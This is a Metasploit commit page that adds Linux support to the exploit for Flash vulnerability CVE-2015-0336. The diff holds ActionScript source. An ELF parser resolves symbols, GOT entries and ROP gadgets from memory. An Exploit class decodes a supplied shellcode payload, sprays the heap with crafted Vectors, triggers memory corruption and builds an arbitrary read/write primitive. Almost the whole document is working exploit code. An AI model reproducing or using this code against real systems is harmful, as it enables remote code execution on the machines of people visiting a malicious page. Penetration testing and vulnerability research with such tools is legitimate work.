Skip to content

Commit 00a80ce

Browse files
committed
Land rapid7#5425, Add Linux support to CVE-2015-0336
2 parents 52e30d4 + 2a260f0 commit 00a80ce

File tree

14 files changed

+1106
-321
lines changed

14 files changed

+1106
-321
lines changed

data/exploits/CVE-2015-0336/msf.swf

100755100644
2.42 KB
Binary file not shown.
340 Bytes
Binary file not shown.
Lines changed: 235 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,235 @@
1+
package
2+
{
3+
public class Elf
4+
{
5+
private const PT_DYNAMIC:uint = 2
6+
private const PT_LOAD:uint = 1
7+
private const PT_READ_EXEC:uint = 5
8+
private const DT_SYMTAB:uint = 6
9+
private const DT_STRTAB:uint = 5
10+
private const DT_PLTGOT:uint = 3
11+
12+
private var e_ba:ExploitByteArray
13+
// elf base address
14+
public var base:uint = 0
15+
// program header address
16+
public var ph:uint = 0
17+
// number of program headers
18+
public var ph_size:uint = 0
19+
// program header entry size
20+
public var ph_esize:uint = 0
21+
// DYNAMIC segment address
22+
public var seg_dynamic:uint = 0
23+
// DYNAMIC segment size
24+
public var seg_dynamic_size:uint = 0
25+
// CODE segment address
26+
public var seg_exec:uint = 0
27+
// CODE segment size
28+
public var seg_exec_size:uint = 0
29+
// .dynsyn section address
30+
public var sec_dynsym:uint = 0
31+
// .synstr section address
32+
public var sec_dynstr:uint = 0
33+
// .got.plt section address
34+
public var sec_got_plt:uint = 0
35+
36+
public function Elf(ba:ExploitByteArray, addr:uint)
37+
{
38+
e_ba = ba
39+
set_base(addr)
40+
set_program_header()
41+
set_program_header_size()
42+
set_program_header_entry_size()
43+
set_dynamic_segment()
44+
set_exec_segment()
45+
set_dynsym()
46+
set_dynstr()
47+
set_got_plt()
48+
}
49+
50+
public function external_symbol(name:String):uint {
51+
var entry:uint = 0
52+
var st_name:uint = 0
53+
var st_value:uint = 0
54+
var st_size:uint = 0
55+
var st_info:uint = 0
56+
var st_other:uint = 0
57+
var st_shndx:uint = 0
58+
var st_string:String = ""
59+
var got_plt_index:uint = 0
60+
61+
for(var i:uint = 0; i < 1000; i++) { // 1000 is just a limit
62+
entry = sec_dynsym + 0x10 + (i * 0x10)
63+
st_name = e_ba.read(entry)
64+
st_value = e_ba.read(entry + 4)
65+
st_info = e_ba.read(entry + 0xc, "byte")
66+
st_string = e_ba.read_string(sec_dynstr + st_name)
67+
if (st_string == name) {
68+
return e_ba.read(sec_got_plt + 0xc + (got_plt_index * 4))
69+
}
70+
if (st_info != 0x11) {
71+
got_plt_index++
72+
}
73+
}
74+
throw new Error()
75+
}
76+
77+
public function symbol(name:String):uint {
78+
var entry:uint = 0
79+
var st_name:uint = 0
80+
var st_value:uint = 0
81+
var st_size:uint = 0
82+
var st_info:uint = 0
83+
var st_other:uint = 0
84+
var st_shndx:uint = 0
85+
var st_string:String = ""
86+
87+
for(var i:uint = 0; i < 3000; i++) { // 3000 is just a limit
88+
entry = sec_dynsym + 0x10 + (i * 0x10)
89+
st_name = e_ba.read(entry)
90+
st_value = e_ba.read(entry + 4)
91+
st_info = e_ba.read(entry + 0xc, "byte")
92+
st_string = e_ba.read_string(sec_dynstr + st_name)
93+
if (st_string == name) {
94+
return base + st_value
95+
}
96+
}
97+
throw new Error()
98+
}
99+
100+
101+
public function gadget(gadget:String, hint:uint):uint
102+
{
103+
var value:uint = parseInt(gadget, 16)
104+
var contents:uint = 0
105+
for (var i:uint = 0; i < seg_exec_size - 4; i++) {
106+
contents = e_ba.read(seg_exec + i)
107+
if (hint == 0xffffffff && value == contents) {
108+
return seg_exec + i
109+
}
110+
if (hint != 0xffffffff && value == (contents & hint)) {
111+
return seg_exec + i
112+
}
113+
}
114+
throw new Error()
115+
}
116+
117+
private function set_base(addr:uint):void
118+
{
119+
addr &= 0xffff0000
120+
while (true) {
121+
if (e_ba.read(addr) == 0x464c457f) {
122+
base = addr
123+
return
124+
}
125+
addr -= 0x1000
126+
}
127+
128+
throw new Error()
129+
}
130+
131+
private function set_program_header():void
132+
{
133+
ph = base + e_ba.read(base + 0x1c)
134+
}
135+
136+
private function set_program_header_size():void
137+
{
138+
ph_size = e_ba.read(base + 0x2c, "word")
139+
}
140+
141+
private function set_program_header_entry_size():void
142+
{
143+
ph_esize = e_ba.read(base + 0x2a, "word")
144+
}
145+
146+
private function set_dynamic_segment():void
147+
{
148+
var entry:uint = 0
149+
var p_type:uint = 0
150+
151+
for (var i:uint = 0; i < ph_size; i++) {
152+
entry = ph + (i * ph_esize)
153+
p_type = e_ba.read(entry)
154+
if (p_type == PT_DYNAMIC) {
155+
seg_dynamic = base + e_ba.read(entry + 8)
156+
seg_dynamic_size = e_ba.read(entry + 0x14)
157+
return
158+
}
159+
}
160+
161+
throw new Error()
162+
}
163+
164+
private function set_exec_segment():void
165+
{
166+
var entry:uint = 0
167+
var p_type:uint = 0
168+
var p_flags:uint = 0
169+
170+
for (var i:uint = 0; i < ph_size; i++) {
171+
entry = ph + (i * ph_esize)
172+
p_type = e_ba.read(entry)
173+
p_flags = e_ba.read(entry + 0x18)
174+
if (p_type == PT_LOAD && (p_flags & PT_READ_EXEC) == PT_READ_EXEC) {
175+
seg_exec = base + e_ba.read(entry + 8)
176+
seg_exec_size = e_ba.read(entry + 0x14)
177+
return
178+
}
179+
}
180+
181+
throw new Error()
182+
}
183+
184+
private function set_dynsym():void
185+
{
186+
var entry:uint = 0
187+
var s_type:uint = 0
188+
189+
for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
190+
entry = seg_dynamic + i
191+
s_type = e_ba.read(entry)
192+
if (s_type == DT_SYMTAB) {
193+
sec_dynsym = e_ba.read(entry + 4)
194+
return
195+
}
196+
}
197+
198+
throw new Error()
199+
}
200+
201+
private function set_dynstr():void
202+
{
203+
var entry:uint = 0
204+
var s_type:uint = 0
205+
206+
for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
207+
entry = seg_dynamic + i
208+
s_type = e_ba.read(entry)
209+
if (s_type == DT_STRTAB) {
210+
sec_dynstr = e_ba.read(entry + 4)
211+
return
212+
}
213+
}
214+
215+
throw new Error()
216+
}
217+
218+
private function set_got_plt():void
219+
{
220+
var entry:uint = 0
221+
var s_type:uint = 0
222+
223+
for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
224+
entry = seg_dynamic + i
225+
s_type = e_ba.read(entry)
226+
if (s_type == DT_PLTGOT) {
227+
sec_got_plt = e_ba.read(entry + 4)
228+
return
229+
}
230+
}
231+
232+
throw new Error()
233+
}
234+
}
235+
}
Lines changed: 120 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,120 @@
1+
// Build how to:
2+
// 1. Download the AIRSDK, and use its compiler.
3+
// 3. Download the Flex SDK (4.6)
4+
// 4. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)
5+
// (all of them, also, subfolders, specially mx, necessary for the Base64Decoder)
6+
// 5. Build with: mxmlc -o msf.swf Exploit.as
7+
8+
// It uses some original code from @hdarwin89 for exploitation using ba's and vectors
9+
10+
package
11+
{
12+
import flash.display.Sprite
13+
import flash.display.LoaderInfo
14+
import flash.display.Loader
15+
import flash.utils.ByteArray
16+
import flash.utils.Endian
17+
import flash.utils.*
18+
import flash.external.ExternalInterface
19+
import mx.utils.Base64Decoder
20+
21+
22+
public class Exploit extends Sprite
23+
{
24+
private var uv:Vector.<uint> = new Vector.<uint>
25+
private var exploiter:Exploiter
26+
27+
private var spray:Vector.<Object> = new Vector.<Object>(89698)
28+
private var interval_id:uint
29+
private var trigger_swf:String
30+
private var b64:Base64Decoder = new Base64Decoder()
31+
private var payload:String
32+
private var platform:String
33+
34+
public function Exploit()
35+
{
36+
var i:uint = 0
37+
platform = LoaderInfo(this.root.loaderInfo).parameters.pl
38+
trigger_swf = LoaderInfo(this.root.loaderInfo).parameters.tr
39+
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
40+
var pattern:RegExp = / /g;
41+
b64_payload = b64_payload.replace(pattern, "+")
42+
b64.decode(b64_payload)
43+
payload = b64.toByteArray().toString()
44+
45+
if (platform == 'win') {
46+
for (i = 0; i < 89698; i = i + 1) {
47+
spray[i] = new Vector.<uint>(1014)
48+
spray[i][0] = 0xdeadbeef
49+
spray[i][1] = 0xdeedbeef
50+
spray[i][2] = i
51+
spray[i][29] = 0x1a1e1429
52+
}
53+
54+
for(i = 0; i < 89698; i = i + 1) {
55+
spray[i].length = 0x1e
56+
}
57+
} else if (platform == 'linux') {
58+
for (i = 0; i < 89698; i = i + 1) {
59+
spray[i] = new Vector.<uint>(1022)
60+
spray[i][0] = 0xdeadbeef
61+
spray[i][1] = 0xdeedbeef
62+
spray[i][2] = i
63+
spray[i][29] = 0x956c1490 // 0x956c1490 + 0xb6c => 0x956c1ffc => controlled by position 1021
64+
spray[i][39] = 1 // 0x956c1fac + 0xf8 => is_connected = 1 in order to allow corruption of offsets 0x54 and 0x58
65+
spray[i][1021] = 0x956c1fac // 0x956c1fac + 0x54 => 0x956c2000 (0x54, and 0x58 offsets are corrupted)
66+
}
67+
}
68+
69+
var trigger_byte_array:ByteArray = createByteArray(trigger_swf)
70+
trigger_byte_array.endian = Endian.LITTLE_ENDIAN
71+
trigger_byte_array.position = 0
72+
// Trigger corruption
73+
var trigger_loader:Loader = new Loader()
74+
trigger_loader.loadBytes(trigger_byte_array)
75+
76+
interval_id = setTimeout(do_exploit, 2000)
77+
}
78+
79+
80+
private function createByteArray(hex_string:String) : ByteArray {
81+
var byte:String
82+
var byte_array:ByteArray = new ByteArray()
83+
var hex_string_length:uint = hex_string.length
84+
var i:uint = 0
85+
while(i < hex_string_length)
86+
{
87+
byte = hex_string.charAt(i) + hex_string.charAt(i + 1)
88+
byte_array.writeByte(parseInt(byte,16))
89+
i = i + 2
90+
}
91+
return byte_array
92+
}
93+
94+
private function do_exploit():void {
95+
clearTimeout(interval_id)
96+
97+
for(var i:uint = 0; i < spray.length; i = i + 1) {
98+
if (spray[i].length != 1022 && spray[i].length != 0x1e) {
99+
Logger.log('[*] Exploit - Found corrupted vector at ' + i + ' with length 0x' + spray[i].length.toString(16))
100+
spray[i][0x3ffffffe] = 0xffffffff
101+
spray[i][0x3fffffff] = spray[i][1023]
102+
uv = spray[i]
103+
}
104+
}
105+
106+
for(i = 0; i < spray.length; i = i + 1) {
107+
if (spray[i].length == 1022 || spray[i].length == 0x1e) {
108+
spray[i] = null
109+
}
110+
}
111+
112+
if (uv == null || uv.length != 0xffffffff) {
113+
return
114+
}
115+
116+
exploiter = new Exploiter(this, platform, payload, uv)
117+
}
118+
}
119+
}
120+

0 commit comments

Comments
 (0)